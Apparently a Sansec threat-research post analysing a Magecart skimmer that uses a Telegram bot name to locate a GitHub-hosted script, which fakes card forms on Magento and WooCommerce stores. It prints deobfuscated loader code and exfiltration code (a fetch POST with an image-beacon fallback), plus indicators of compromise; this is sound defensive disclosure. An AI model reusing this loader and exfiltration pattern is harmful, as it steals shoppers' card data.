Sansec logo

Malware Persistence via Telegram and GitHub


by Sansec Forensics Team

Published in Threat Research − August 22, 2023

Credit card thieves now use Telegram and Github to steal customer data.

Malware Persistence via Telegram and GitHub

Attackers are devising ingenious methods to prolong their skimming activities, aiming for sustained persistence.

The usual tactics, techniques, and procedures (TTP) include the creation of disposable domains to house malware and facilitate the extraction of credit card information.

However, these throwaway domains are susceptible to takedowns and often become swiftly identified by malware researchers.

A novel variant of the Magecart threat has surfaced, aiming to circumvent these challenges.

Telegram Loader

The loader is first hidden behind obfuscation. However, once this obfuscation is removed, it becomes evident what is taking place:

  .then((resp) => resp.json())
  .then((resp) => {
    const [username, path] = resp.result.first_name.split(",");
    const script = document.createElement("script");
    script.src =
      "https://" + username + "" + path + ".js?r=" + Math.random();
    try {
    } catch (e) {
  1. Initially, a request is sent to the Telegram bot API to fetch specific information about a designated bot:
  2. The "first name" of the bot is then divided using a comma as the separator.
  3. The first part contains the GitHub username.
  4. The subsequent part indicates the file path intended for loading.
  5. Afterward, a script is attached to the webpage found at https://<username><path>.js.

This approach eliminates the need for the attacker to utilize a disposable domain or set up infrastructure for hosting malicious scripts. This is due to the fact that the scripts are directly loaded from GitHub.

Furthermore, even if GitHub takes action to deactivate this account, the individual could easily create a new account and update the Telegram bot's name accordingly.

GitHub Hosted Multi-Skimmer

The current response from the Telegram API takes the form of the following JSON structure:

  "ok": true,
  "result": {
    "id": 6167771222,
    "is_bot": true,
    "first_name": "jubilmaria,homepage/swco",
    "username": "asddq4t44w3f45y45refbot",
    "can_join_groups": true,
    "can_read_all_group_messages": false,
    "supports_inline_queries": false

This dataset allows us to deduce the following insights:

  • The GitHub account corresponds to jubilmaria.
  • The repository in question is labeled as homepage.
  • The specific script designated for loading is identified as swco.js.

While this repository outwardly presents itself as a legitimate entity:

The contents concealed within are, in reality, malicious and are exposed through GitHub Pages.

The loaded script, swco.js, is composed of four distinct skimmers, each finely tuned to specific targets. swco.js performs checks on and window.location.href against a roster of compromised stores, subsequently selecting from three skimmer variations:

  1. Authorizenet (Magento 2)
  2. Klarna Checkout
  3. Authorizenet (WooCommerce)

In cases where the current window location lacks a precise store match, the script defaults to a more generalized skimmer designed to exploit both Magento and WooCommerce platforms.

Across all versions, users are confronted with a counterfeit credit card form. The data inputted into these forms is then transferred to

fetch("", {
  headers: {
    Accept: "application/json",
    "Content-Type": "application/json",
  body: JSON.stringify(_0x1e3c4c),
  method: "POST",
  .then((_0x4900b6) => {
    setTimeout(() => {
      alert("Waiting time exceeded");
    }, 2500);
  .catch((_0x112e4a) => {
    new Image().src =
      "" +
    setTimeout(() => {
      alert("Waiting time exceeded");
    }, 2500);

Initially, an attempt is made to initiate a POST request for data exfiltration. Should this prove unsuccessful, an alternative method involving a fake Image is employed as an exfiltration mechanism.

Once 2.5 seconds have transpired, an alert is presented to the user, accompanied by a page refresh. Following this reload, the user is presented with the authentic credit card form.

At present, the domain resolves to, a dedicated server registered with Regxa, Ltd.

Indicators of compromise

  • jubilmaria
  • bot6167771222
  • asddq4t44w3f45y45refbot

Read more

Scan your store now
for malware & vulnerabilities

$ curl | sh

eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.

Stay up to date with the latest eCommerce attacks

Sansec logo

experts in eCommerce security


Terms & Conditions
Privacy & Cookie Policy
Company Reg 77165187
Tax NL860920306B01